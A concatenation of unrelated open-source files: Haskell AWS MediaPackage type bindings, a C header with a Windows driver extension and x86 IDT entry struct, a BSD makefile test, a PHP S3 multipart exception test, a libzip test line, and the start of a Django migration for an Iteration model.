-- (via catMaybes); "id" is always emitted.
instance ToJSON HlsManifestCreateOrUpdateParameters
         where
        toJSON HlsManifestCreateOrUpdateParameters'{..}
          = object
              (catMaybes
                 [("manifestName" .=) <$> _hmcoupManifestName,
                  ("playlistType" .=) <$> _hmcoupPlaylistType,
                  ("programDateTimeIntervalSeconds" .=) <$>
                    _hmcoupProgramDateTimeIntervalSeconds,
                  ("adMarkers" .=) <$> _hmcoupAdMarkers,
                  ("includeIframeOnlyStream" .=) <$>
                    _hmcoupIncludeIframeOnlyStream,
                  ("playlistWindowSeconds" .=) <$>
                    _hmcoupPlaylistWindowSeconds,
                  Just ("id" .= _hmcoupId)])
-- | An HTTP Live Streaming (HLS) packaging configuration.
--
-- All fields are optional; a bare 'hlsPackage' is a valid request value.
--
-- /See:/ 'hlsPackage' smart constructor.
data HlsPackage = HlsPackage'
  { _hpUseAudioRenditionGroup :: !(Maybe Bool)
  , _hpPlaylistType :: !(Maybe PlaylistType)
  , _hpSegmentDurationSeconds :: !(Maybe Int)
  , _hpProgramDateTimeIntervalSeconds :: !(Maybe Int)
  , _hpStreamSelection :: !(Maybe StreamSelection)
  , _hpAdMarkers :: !(Maybe AdMarkers)
  , _hpEncryption :: !(Maybe HlsEncryption)
  , _hpIncludeIframeOnlyStream :: !(Maybe Bool)
  , _hpPlaylistWindowSeconds :: !(Maybe Int)
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'HlsPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'hpUseAudioRenditionGroup' - When enabled, audio streams will be placed in rendition groups in the output.
--
-- * 'hpPlaylistType' - The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
--
-- * 'hpSegmentDurationSeconds' - Duration (in seconds) of each fragment. Actual fragments will be rounded to the nearest multiple of the source fragment duration.
--
-- * 'hpProgramDateTimeIntervalSeconds' - The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
--
-- * 'hpStreamSelection' - Undocumented member.
--
-- * 'hpAdMarkers' - This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
--
-- * 'hpEncryption' - Undocumented member.
--
-- * 'hpIncludeIframeOnlyStream' - When enabled, an I-Frame only stream will be included in the output.
--
-- * 'hpPlaylistWindowSeconds' - Time window (in seconds) contained in each parent manifest.
hlsPackage
    :: HlsPackage
hlsPackage =
  HlsPackage'
    { _hpUseAudioRenditionGroup = Nothing
    , _hpPlaylistType = Nothing
    , _hpSegmentDurationSeconds = Nothing
    , _hpProgramDateTimeIntervalSeconds = Nothing
    , _hpStreamSelection = Nothing
    , _hpAdMarkers = Nothing
    , _hpEncryption = Nothing
    , _hpIncludeIframeOnlyStream = Nothing
    , _hpPlaylistWindowSeconds = Nothing
    }
-- | When enabled, audio streams will be placed in rendition groups in the output.
hpUseAudioRenditionGroup :: Lens' HlsPackage (Maybe Bool)
hpUseAudioRenditionGroup = lens _hpUseAudioRenditionGroup (\ s a -> s{_hpUseAudioRenditionGroup = a})
-- | The HTTP Live Streaming (HLS) playlist type. When either "EVENT" or "VOD" is specified, a corresponding EXT-X-PLAYLIST-TYPE entry will be included in the media playlist.
hpPlaylistType :: Lens' HlsPackage (Maybe PlaylistType)
hpPlaylistType = lens _hpPlaylistType (\ s a -> s{_hpPlaylistType = a})
-- | Duration (in seconds) of each fragment. Actual fragments will be rounded to the nearest multiple of the source fragment duration.
hpSegmentDurationSeconds :: Lens' HlsPackage (Maybe Int)
hpSegmentDurationSeconds = lens _hpSegmentDurationSeconds (\ s a -> s{_hpSegmentDurationSeconds = a})
-- | The interval (in seconds) between each EXT-X-PROGRAM-DATE-TIME tag inserted into manifests. Additionally, when an interval is specified ID3Timed Metadata messages will be generated every 5 seconds using the ingest time of the content. If the interval is not specified, or set to 0, then no EXT-X-PROGRAM-DATE-TIME tags will be inserted into manifests and no ID3Timed Metadata messages will be generated. Note that irrespective of this parameter, if any ID3 Timed Metadata is found in HTTP Live Streaming (HLS) input, it will be passed through to HLS output.
hpProgramDateTimeIntervalSeconds :: Lens' HlsPackage (Maybe Int)
hpProgramDateTimeIntervalSeconds = lens _hpProgramDateTimeIntervalSeconds (\ s a -> s{_hpProgramDateTimeIntervalSeconds = a})
-- | Undocumented member.
hpStreamSelection :: Lens' HlsPackage (Maybe StreamSelection)
hpStreamSelection = lens _hpStreamSelection (\ s a -> s{_hpStreamSelection = a})
-- | This setting controls how ad markers are included in the packaged OriginEndpoint. "NONE" will omit all SCTE-35 ad markers from the output. "PASSTHROUGH" causes the manifest to contain a copy of the SCTE-35 ad markers (comments) taken directly from the input HTTP Live Streaming (HLS) manifest. "SCTE35_ENHANCED" generates ad markers and blackout tags based on SCTE-35 messages in the input source.
hpAdMarkers :: Lens' HlsPackage (Maybe AdMarkers)
hpAdMarkers = lens _hpAdMarkers (\ s a -> s{_hpAdMarkers = a})
-- | Undocumented member.
hpEncryption :: Lens' HlsPackage (Maybe HlsEncryption)
hpEncryption = lens _hpEncryption (\ s a -> s{_hpEncryption = a})
-- | When enabled, an I-Frame only stream will be included in the output.
hpIncludeIframeOnlyStream :: Lens' HlsPackage (Maybe Bool)
hpIncludeIframeOnlyStream = lens _hpIncludeIframeOnlyStream (\ s a -> s{_hpIncludeIframeOnlyStream = a})
-- | Time window (in seconds) contained in each parent manifest.
hpPlaylistWindowSeconds :: Lens' HlsPackage (Maybe Int)
hpPlaylistWindowSeconds = lens _hpPlaylistWindowSeconds (\ s a -> s{_hpPlaylistWindowSeconds = a})
instance FromJSON HlsPackage where
        parseJSON
          = withObject "HlsPackage"
              (\ x ->
                 HlsPackage' <$>
                   (x .:? "useAudioRenditionGroup") <*>
                     (x .:? "playlistType")
                     <*> (x .:? "segmentDurationSeconds")
                     <*> (x .:? "programDateTimeIntervalSeconds")
                     <*> (x .:? "streamSelection")
                     <*> (x .:? "adMarkers")
                     <*> (x .:? "encryption")
                     <*> (x .:? "includeIframeOnlyStream")
                     <*> (x .:? "playlistWindowSeconds"))
instance Hashable HlsPackage where
instance NFData HlsPackage where
-- JSON encoding: Nothing fields are omitted from the serialized object.
instance ToJSON HlsPackage where
        toJSON HlsPackage'{..}
          = object
              (catMaybes
                 [("useAudioRenditionGroup" .=) <$>
                    _hpUseAudioRenditionGroup,
                  ("playlistType" .=) <$> _hpPlaylistType,
                  ("segmentDurationSeconds" .=) <$>
                    _hpSegmentDurationSeconds,
                  ("programDateTimeIntervalSeconds" .=) <$>
                    _hpProgramDateTimeIntervalSeconds,
                  ("streamSelection" .=) <$> _hpStreamSelection,
                  ("adMarkers" .=) <$> _hpAdMarkers,
                  ("encryption" .=) <$> _hpEncryption,
                  ("includeIframeOnlyStream" .=) <$>
                    _hpIncludeIframeOnlyStream,
                  ("playlistWindowSeconds" .=) <$>
                    _hpPlaylistWindowSeconds])
-- | An endpoint for ingesting source content for a Channel.
--
-- Response-only type: there is no 'ToJSON' instance because it is never sent
-- to the service. NOTE: 'iePassword' carries a credential; avoid logging
-- whole values of this type.
--
-- /See:/ 'ingestEndpoint' smart constructor.
data IngestEndpoint = IngestEndpoint'
  { _ieURL :: !(Maybe Text)
  , _ieUsername :: !(Maybe Text)
  , _iePassword :: !(Maybe Text)
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'IngestEndpoint' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ieURL' - The ingest URL to which the source stream should be sent.
--
-- * 'ieUsername' - The system generated username for ingest authentication.
--
-- * 'iePassword' - The system generated password for ingest authentication.
ingestEndpoint
    :: IngestEndpoint
ingestEndpoint =
  IngestEndpoint'
    {_ieURL = Nothing, _ieUsername = Nothing, _iePassword = Nothing}
-- | The ingest URL to which the source stream should be sent.
ieURL :: Lens' IngestEndpoint (Maybe Text)
ieURL = lens _ieURL (\ s a -> s{_ieURL = a})
-- | The system generated username for ingest authentication.
ieUsername :: Lens' IngestEndpoint (Maybe Text)
ieUsername = lens _ieUsername (\ s a -> s{_ieUsername = a})
-- | The system generated password for ingest authentication.
iePassword :: Lens' IngestEndpoint (Maybe Text)
iePassword = lens _iePassword (\ s a -> s{_iePassword = a})
instance FromJSON IngestEndpoint where
        parseJSON
          = withObject "IngestEndpoint"
              (\ x ->
                 IngestEndpoint' <$>
                   (x .:? "url") <*> (x .:? "username") <*>
                     (x .:? "password"))
instance Hashable IngestEndpoint where
instance NFData IngestEndpoint where
-- | A Microsoft Smooth Streaming (MSS) encryption configuration.
--
-- A newtype over the single required 'SpekeKeyProvider' field.
--
-- /See:/ 'mssEncryption' smart constructor.
newtype MssEncryption = MssEncryption'
  { _meSpekeKeyProvider :: SpekeKeyProvider
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'MssEncryption' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'meSpekeKeyProvider' - Undocumented member.
mssEncryption
    :: SpekeKeyProvider -- ^ 'meSpekeKeyProvider'
    -> MssEncryption
mssEncryption pSpekeKeyProvider_ =
  MssEncryption' {_meSpekeKeyProvider = pSpekeKeyProvider_}
-- | Undocumented member.
meSpekeKeyProvider :: Lens' MssEncryption SpekeKeyProvider
meSpekeKeyProvider = lens _meSpekeKeyProvider (\ s a -> s{_meSpekeKeyProvider = a})
instance FromJSON MssEncryption where
        parseJSON
          = withObject "MssEncryption"
              (\ x -> MssEncryption' <$> (x .: "spekeKeyProvider"))
instance Hashable MssEncryption where
instance NFData MssEncryption where
instance ToJSON MssEncryption where
        toJSON MssEncryption'{..}
          = object
              (catMaybes
                 [Just ("spekeKeyProvider" .= _meSpekeKeyProvider)])
-- | A Microsoft Smooth Streaming (MSS) packaging configuration.
--
-- All fields are optional; a bare 'mssPackage' is a valid request value.
--
-- /See:/ 'mssPackage' smart constructor.
data MssPackage = MssPackage'
  { _mpSegmentDurationSeconds :: !(Maybe Int)
  , _mpStreamSelection :: !(Maybe StreamSelection)
  , _mpEncryption :: !(Maybe MssEncryption)
  , _mpManifestWindowSeconds :: !(Maybe Int)
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'MssPackage' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'mpSegmentDurationSeconds' - The duration (in seconds) of each segment.
--
-- * 'mpStreamSelection' - Undocumented member.
--
-- * 'mpEncryption' - Undocumented member.
--
-- * 'mpManifestWindowSeconds' - The time window (in seconds) contained in each manifest.
mssPackage
    :: MssPackage
mssPackage =
  MssPackage'
    { _mpSegmentDurationSeconds = Nothing
    , _mpStreamSelection = Nothing
    , _mpEncryption = Nothing
    , _mpManifestWindowSeconds = Nothing
    }
-- | The duration (in seconds) of each segment.
mpSegmentDurationSeconds :: Lens' MssPackage (Maybe Int)
mpSegmentDurationSeconds = lens _mpSegmentDurationSeconds (\ s a -> s{_mpSegmentDurationSeconds = a})
-- | Undocumented member.
mpStreamSelection :: Lens' MssPackage (Maybe StreamSelection)
mpStreamSelection = lens _mpStreamSelection (\ s a -> s{_mpStreamSelection = a})
-- | Undocumented member.
mpEncryption :: Lens' MssPackage (Maybe MssEncryption)
mpEncryption = lens _mpEncryption (\ s a -> s{_mpEncryption = a})
-- | The time window (in seconds) contained in each manifest.
mpManifestWindowSeconds :: Lens' MssPackage (Maybe Int)
mpManifestWindowSeconds = lens _mpManifestWindowSeconds (\ s a -> s{_mpManifestWindowSeconds = a})
instance FromJSON MssPackage where
        parseJSON
          = withObject "MssPackage"
              (\ x ->
                 MssPackage' <$>
                   (x .:? "segmentDurationSeconds") <*>
                     (x .:? "streamSelection")
                     <*> (x .:? "encryption")
                     <*> (x .:? "manifestWindowSeconds"))
instance Hashable MssPackage where
instance NFData MssPackage where
-- JSON encoding: Nothing fields are omitted from the serialized object.
instance ToJSON MssPackage where
        toJSON MssPackage'{..}
          = object
              (catMaybes
                 [("segmentDurationSeconds" .=) <$>
                    _mpSegmentDurationSeconds,
                  ("streamSelection" .=) <$> _mpStreamSelection,
                  ("encryption" .=) <$> _mpEncryption,
                  ("manifestWindowSeconds" .=) <$>
                    _mpManifestWindowSeconds])
-- | An OriginEndpoint resource configuration.
--
-- Response-only type (no 'ToJSON' instance); every field is optional on the
-- wire.
--
-- /See:/ 'originEndpoint' smart constructor.
data OriginEndpoint = OriginEndpoint'
  { _oeWhitelist :: !(Maybe [Text])
  , _oeHlsPackage :: !(Maybe HlsPackage)
  , _oeARN :: !(Maybe Text)
  , _oeManifestName :: !(Maybe Text)
  , _oeURL :: !(Maybe Text)
  , _oeChannelId :: !(Maybe Text)
  , _oeStartoverWindowSeconds :: !(Maybe Int)
  , _oeDashPackage :: !(Maybe DashPackage)
  , _oeMssPackage :: !(Maybe MssPackage)
  , _oeId :: !(Maybe Text)
  , _oeTimeDelaySeconds :: !(Maybe Int)
  , _oeCmafPackage :: !(Maybe CmafPackage)
  , _oeDescription :: !(Maybe Text)
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'OriginEndpoint' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'oeWhitelist' - A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
--
-- * 'oeHlsPackage' - Undocumented member.
--
-- * 'oeARN' - The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
--
-- * 'oeManifestName' - A short string appended to the end of the OriginEndpoint URL.
--
-- * 'oeURL' - The URL of the packaged OriginEndpoint for consumption.
--
-- * 'oeChannelId' - The ID of the Channel the OriginEndpoint is associated with.
--
-- * 'oeStartoverWindowSeconds' - Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
--
-- * 'oeDashPackage' - Undocumented member.
--
-- * 'oeMssPackage' - Undocumented member.
--
-- * 'oeId' - The ID of the OriginEndpoint.
--
-- * 'oeTimeDelaySeconds' - Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
--
-- * 'oeCmafPackage' - Undocumented member.
--
-- * 'oeDescription' - A short text description of the OriginEndpoint.
originEndpoint
    :: OriginEndpoint
originEndpoint =
  OriginEndpoint'
    { _oeWhitelist = Nothing
    , _oeHlsPackage = Nothing
    , _oeARN = Nothing
    , _oeManifestName = Nothing
    , _oeURL = Nothing
    , _oeChannelId = Nothing
    , _oeStartoverWindowSeconds = Nothing
    , _oeDashPackage = Nothing
    , _oeMssPackage = Nothing
    , _oeId = Nothing
    , _oeTimeDelaySeconds = Nothing
    , _oeCmafPackage = Nothing
    , _oeDescription = Nothing
    }
-- | A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
-- Note: the '_Default' iso maps an absent ('Nothing') whitelist to the empty
-- list, so this lens presents a plain @[Text]@.
oeWhitelist :: Lens' OriginEndpoint [Text]
oeWhitelist = lens _oeWhitelist (\ s a -> s{_oeWhitelist = a}) . _Default . _Coerce
-- | Undocumented member.
oeHlsPackage :: Lens' OriginEndpoint (Maybe HlsPackage)
oeHlsPackage = lens _oeHlsPackage (\ s a -> s{_oeHlsPackage = a})
-- | The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
oeARN :: Lens' OriginEndpoint (Maybe Text)
oeARN = lens _oeARN (\ s a -> s{_oeARN = a})
-- | A short string appended to the end of the OriginEndpoint URL.
oeManifestName :: Lens' OriginEndpoint (Maybe Text)
oeManifestName = lens _oeManifestName (\ s a -> s{_oeManifestName = a})
-- | The URL of the packaged OriginEndpoint for consumption.
oeURL :: Lens' OriginEndpoint (Maybe Text)
oeURL = lens _oeURL (\ s a -> s{_oeURL = a})
-- | The ID of the Channel the OriginEndpoint is associated with.
oeChannelId :: Lens' OriginEndpoint (Maybe Text)
oeChannelId = lens _oeChannelId (\ s a -> s{_oeChannelId = a})
-- | Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
oeStartoverWindowSeconds :: Lens' OriginEndpoint (Maybe Int)
oeStartoverWindowSeconds = lens _oeStartoverWindowSeconds (\ s a -> s{_oeStartoverWindowSeconds = a})
-- | Undocumented member.
oeDashPackage :: Lens' OriginEndpoint (Maybe DashPackage)
oeDashPackage = lens _oeDashPackage (\ s a -> s{_oeDashPackage = a})
-- | Undocumented member.
oeMssPackage :: Lens' OriginEndpoint (Maybe MssPackage)
oeMssPackage = lens _oeMssPackage (\ s a -> s{_oeMssPackage = a})
-- | The ID of the OriginEndpoint.
oeId :: Lens' OriginEndpoint (Maybe Text)
oeId = lens _oeId (\ s a -> s{_oeId = a})
-- | Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
oeTimeDelaySeconds :: Lens' OriginEndpoint (Maybe Int)
oeTimeDelaySeconds = lens _oeTimeDelaySeconds (\ s a -> s{_oeTimeDelaySeconds = a})
-- | Undocumented member.
oeCmafPackage :: Lens' OriginEndpoint (Maybe CmafPackage)
oeCmafPackage = lens _oeCmafPackage (\ s a -> s{_oeCmafPackage = a})
-- | A short text description of the OriginEndpoint.
oeDescription :: Lens' OriginEndpoint (Maybe Text)
oeDescription = lens _oeDescription (\ s a -> s{_oeDescription = a})
-- JSON decoding: a missing "whitelist" key decodes as the empty list
-- (.!= mempty); all other fields stay Maybe.
instance FromJSON OriginEndpoint where
        parseJSON
          = withObject "OriginEndpoint"
              (\ x ->
                 OriginEndpoint' <$>
                   (x .:? "whitelist" .!= mempty) <*>
                     (x .:? "hlsPackage")
                     <*> (x .:? "arn")
                     <*> (x .:? "manifestName")
                     <*> (x .:? "url")
                     <*> (x .:? "channelId")
                     <*> (x .:? "startoverWindowSeconds")
                     <*> (x .:? "dashPackage")
                     <*> (x .:? "mssPackage")
                     <*> (x .:? "id")
                     <*> (x .:? "timeDelaySeconds")
                     <*> (x .:? "cmafPackage")
                     <*> (x .:? "description"))
instance Hashable OriginEndpoint where
instance NFData OriginEndpoint where
-- | A configuration for accessing an external Secure Packager and Encoder Key Exchange (SPEKE) service that will provide encryption keys.
--
-- All four fields are required on the wire; the smart constructor starts
-- 'skpSystemIds' as the empty list.
--
-- /See:/ 'spekeKeyProvider' smart constructor.
data SpekeKeyProvider = SpekeKeyProvider'
  { _skpURL :: !Text
  , _skpResourceId :: !Text
  , _skpRoleARN :: !Text
  , _skpSystemIds :: ![Text]
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'SpekeKeyProvider' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'skpURL' - The URL of the external key provider service.
--
-- * 'skpResourceId' - The resource ID to include in key requests.
--
-- * 'skpRoleARN' - An Amazon Resource Name (ARN) of an IAM role that AWS Elemental MediaPackage will assume when accessing the key provider service.
--
-- * 'skpSystemIds' - The system IDs to include in key requests.
spekeKeyProvider
    :: Text -- ^ 'skpURL'
    -> Text -- ^ 'skpResourceId'
    -> Text -- ^ 'skpRoleARN'
    -> SpekeKeyProvider
spekeKeyProvider pURL_ pResourceId_ pRoleARN_ =
  SpekeKeyProvider'
    { _skpURL = pURL_
    , _skpResourceId = pResourceId_
    , _skpRoleARN = pRoleARN_
    , _skpSystemIds = mempty
    }
-- | The URL of the external key provider service.
skpURL :: Lens' SpekeKeyProvider Text
skpURL = lens _skpURL (\ s a -> s{_skpURL = a})
-- | The resource ID to include in key requests.
skpResourceId :: Lens' SpekeKeyProvider Text
skpResourceId = lens _skpResourceId (\ s a -> s{_skpResourceId = a})
-- | An Amazon Resource Name (ARN) of an IAM role that AWS Elemental MediaPackage will assume when accessing the key provider service.
skpRoleARN :: Lens' SpekeKeyProvider Text
skpRoleARN = lens _skpRoleARN (\ s a -> s{_skpRoleARN = a})
-- | The system IDs to include in key requests.
skpSystemIds :: Lens' SpekeKeyProvider [Text]
skpSystemIds = lens _skpSystemIds (\ s a -> s{_skpSystemIds = a}) . _Coerce
-- JSON decoding: "systemIds" falls back to the empty list when absent.
instance FromJSON SpekeKeyProvider where
        parseJSON
          = withObject "SpekeKeyProvider"
              (\ x ->
                 SpekeKeyProvider' <$>
                   (x .: "url") <*> (x .: "resourceId") <*>
                     (x .: "roleArn")
                     <*> (x .:? "systemIds" .!= mempty))
instance Hashable SpekeKeyProvider where
instance NFData SpekeKeyProvider where
instance ToJSON SpekeKeyProvider where
        toJSON SpekeKeyProvider'{..}
          = object
              (catMaybes
                 [Just ("url" .= _skpURL),
                  Just ("resourceId" .= _skpResourceId),
                  Just ("roleArn" .= _skpRoleARN),
                  Just ("systemIds" .= _skpSystemIds)])
-- | A StreamSelection configuration.
--
-- Filters and orders the streams included in an output; all fields optional.
--
-- /See:/ 'streamSelection' smart constructor.
data StreamSelection = StreamSelection'
  { _ssStreamOrder :: !(Maybe StreamOrder)
  , _ssMinVideoBitsPerSecond :: !(Maybe Int)
  , _ssMaxVideoBitsPerSecond :: !(Maybe Int)
  } deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'StreamSelection' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'ssStreamOrder' - A directive that determines the order of streams in the output.
--
-- * 'ssMinVideoBitsPerSecond' - The minimum video bitrate (bps) to include in output.
--
-- * 'ssMaxVideoBitsPerSecond' - The maximum video bitrate (bps) to include in output.
streamSelection
    :: StreamSelection
streamSelection =
  StreamSelection'
    { _ssStreamOrder = Nothing
    , _ssMinVideoBitsPerSecond = Nothing
    , _ssMaxVideoBitsPerSecond = Nothing
    }
-- | A directive that determines the order of streams in the output.
ssStreamOrder :: Lens' StreamSelection (Maybe StreamOrder)
ssStreamOrder = lens _ssStreamOrder (\ s a -> s{_ssStreamOrder = a})
-- | The minimum video bitrate (bps) to include in output.
ssMinVideoBitsPerSecond :: Lens' StreamSelection (Maybe Int)
ssMinVideoBitsPerSecond = lens _ssMinVideoBitsPerSecond (\ s a -> s{_ssMinVideoBitsPerSecond = a})
-- | The maximum video bitrate (bps) to include in output.
ssMaxVideoBitsPerSecond :: Lens' StreamSelection (Maybe Int)
ssMaxVideoBitsPerSecond = lens _ssMaxVideoBitsPerSecond (\ s a -> s{_ssMaxVideoBitsPerSecond = a})
instance FromJSON StreamSelection where
        parseJSON
          = withObject "StreamSelection"
              (\ x ->
                 StreamSelection' <$>
                   (x .:? "streamOrder") <*>
                     (x .:? "minVideoBitsPerSecond")
                     <*> (x .:? "maxVideoBitsPerSecond"))
instance Hashable StreamSelection where
instance NFData StreamSelection where
-- JSON encoding: Nothing fields are omitted from the serialized object.
instance ToJSON StreamSelection where
        toJSON StreamSelection'{..}
          = object
              (catMaybes
                 [("streamOrder" .=) <$> _ssStreamOrder,
                  ("minVideoBitsPerSecond" .=) <$>
                    _ssMinVideoBitsPerSecond,
                  ("maxVideoBitsPerSecond" .=) <$>
                    _ssMaxVideoBitsPerSecond])
| {
"pile_set_name": "Github"
} |
/*
 * Per-device driver state (Windows kernel driver device extension).
 */
typedef struct _DEVICE_EXTENSION
{
    KEVENT kill;        /* presumably signaled to ask the worker thread to exit -- TODO confirm against thread routine */
    PKTHREAD hThread;   /* handle-resolved pointer to the driver's worker thread */
} DEVICE_EXTENSION, *PDEVICE_EXTENSION;
/*
 * x86 (32-bit) interrupt descriptor table (IDT) gate entry. The bitfields
 * mirror the gate's type-attribute byte (Type, S=Always0, DPL, P).
 * NOTE(review): bitfield allocation order is compiler-dependent; this layout
 * matches MSVC/GCC low-to-high packing on x86 -- confirm for other toolchains.
 */
typedef struct idtentry {
    unsigned short OffsetLow;       /* handler address bits 0-15 */
    unsigned short Selector;        /* code segment selector */
    unsigned char Reserved;         /* must be zero */
    unsigned char Type:4;           /* gate type (e.g. interrupt/trap gate) */
    unsigned char Always0:1;        /* storage-segment bit; 0 for gates */
    unsigned char Dpl:2;            /* descriptor privilege level */
    unsigned char Present:1;        /* segment-present flag */
    unsigned short OffsetHigh;      /* handler address bits 16-31 */
} IdtEntry_t, *PIdtEntry_t;
| {
"pile_set_name": "Github"
} |
### TestComplex.mk -- A complex heat generating program
# Author: Michael Grünewald
# Date: Fri Nov 14 10:56:08 CET 2014
# BSD Owl Scripts (https://github.com/michipili/bsdowl)
# This file is part of BSD Owl Scripts
#
# Copyright © 2002–2016 Michael Grünewald. All Rights Reserved.
#
# This file must be used under the terms of the BSD license.
# This source file is licensed as described in the file LICENSE, which
# you should have received as part of this distribution.
# Test-suite metadata: build and install the example C project once, in the
# Release configuration.
TEST_DESCRIPTION= Complex C software made of two libraries and a program
TEST_SOURCEDIR= example/langc/heat
TEST_SEQUENCE= preparatives all install
TEST_MATRIX= CONFIGURATION
TEST_CONFIGURATION= Release
# Verify that librational was installed: static archive, headers, man page.
test-librational:
	test -f ${DESTDIR}${LIBDIR}/librational.a
	test -f ${DESTDIR}${INCLUDEDIR}/rational.h
	test -f ${DESTDIR}${INCLUDEDIR}/rational_trace.h
	test -f ${DESTDIR}${MANDIR}/man3/librational.3.gz
# Verify that libfibonacci was installed.
test-libfibonacci:
	test -f ${DESTDIR}${LIBDIR}/libfibonacci.a
	test -f ${DESTDIR}${INCLUDEDIR}/fibonacci.h
	test -f ${DESTDIR}${MANDIR}/man3/libfibonacci.3.gz
# Verify that the goldenratio program was installed and is executable.
test-goldenratio:
	test -x ${DESTDIR}${BINDIR}/goldenratio
# Verify distribution tarballs and their signatures.
test-dist:
	test -f ${PACKAGE}-${VERSION}.tar.gz
	test -f ${PACKAGE}-${VERSION}.tar.gz.sig
	test -f ${PACKAGE}-${VERSION}.tar.bz2
	test -f ${PACKAGE}-${VERSION}.tar.bz2.sig
# xz tarballs are not produced on Darwin, so skip the check there.
.if!(defined(.MAKE.OS)&&${.MAKE.OS} == Darwin)
	test -f ${PACKAGE}-${VERSION}.tar.xz
	test -f ${PACKAGE}-${VERSION}.tar.xz.sig
.endif
test: test-librational
test: test-libfibonacci
test: test-goldenratio
# The dist check needs GPG; only run it when the test suite enables it.
.if !empty(WITH_TESTSUITE_GPG:Myes)
test: test-dist
.endif
### End of file `TestComplex.mk'
| {
"pile_set_name": "Github"
} |
<?php
namespace Aws\Test\S3\Exception;
use Aws\Command;
use Aws\Exception\AwsException;
use Aws\S3\Exception\S3MultipartUploadException;
use Aws\Multipart\UploadState;
use GuzzleHttp\Psr7;
use PHPUnit\Framework\TestCase;
/**
 * Unit test for the S3 multipart-upload exception: builds an UploadState plus
 * a map of part-number => AwsException and checks that the exception exposes
 * the bucket, key, and source file name of the failed transfer.
 *
 * NOTE(review): the method name reads like a typo for
 * "testCanProvideFailedTransferFilePathInfo"; renaming would be
 * backward-compatible for PHPUnit discovery but is only flagged here.
 *
 * @covers Aws\S3\Exception\S3MultipartUploadException
 */
class S3MultipartUploadExceptionTest extends TestCase
{
    public function testCanProviderFailedTransferFilePathInfo()
    {
        $state = new UploadState([]);
        // Failed parts keyed by part number; the first two carry commands with
        // Bucket/Key/Body, the last has no command parameters at all.
        $failed = [
            1 => new AwsException('Bad digest.', new Command('UploadPart', [
                'Bucket' => 'foo',
                'Key' => 'bar',
                'Body' => Psr7\stream_for('Part 1'),
            ])),
            5 => new AwsException('Missing header.', new Command('UploadPart', [
                'Bucket' => 'foo',
                'Key' => 'bar',
                'Body' => Psr7\stream_for('Part 2'),
            ])),
            8 => new AwsException('Needs more love.', new Command('UploadPart')),
        ];
        $path = '/path/to/the/large/file/test.zip';
        $exception = new S3MultipartUploadException($state, $failed, [
            'file_name' => $path
        ]);
        $this->assertEquals('foo', $exception->getBucket());
        $this->assertEquals('bar', $exception->getKey());
        // Expects 'php://temp' rather than $path -- presumably the exception
        // derives the source name from the part Body streams, not the
        // 'file_name' argument; TODO confirm against the exception class.
        $this->assertEquals('php://temp', $exception->getSourceFileName());
    }
}
| {
"pile_set_name": "Github"
} |
# rename file to UTF-8 name in zip archive
return 0
args testfile rename 0 ÄÖÜßäöü
file testfile testfile.zip testfile-UTF8.zip
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-04-04 21:09
from __future__ import unicode_literals
import django.db.models.deletion
import django.utils.timezone
import jsonfield.fields
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
    # Auto-generated schema migration: introduces the Iteration model,
    # which records one work cycle on a TaskAssignment.

    # Must apply after the previous orchestra schema change.
    dependencies = [
        ('orchestra', '0024_auto_20160325_1916'),
    ]

    operations = [
        migrations.CreateModel(
            name='Iteration',
            fields=[
                ('id', models.AutoField(auto_created=True,
                    primary_key=True, serialize=False, verbose_name='ID')),
                # Iteration opens at creation time by default.
                ('start_datetime', models.DateTimeField(
                    default=django.utils.timezone.now)),
                # Null while the iteration is still in progress.
                ('end_datetime', models.DateTimeField(blank=True, null=True)),
                ('status', models.IntegerField(choices=[
                    (0, 'Processing'), (1, 'Requested Review'), (2, 'Provided Review')])),
                # NOTE(review): default={} is a shared mutable default — jsonfield
                # handles it per-row here, but confirm; do not edit applied migrations.
                ('submitted_data', jsonfield.fields.JSONField(blank=True, default={})),
                # Deleting an assignment cascades to its iterations.
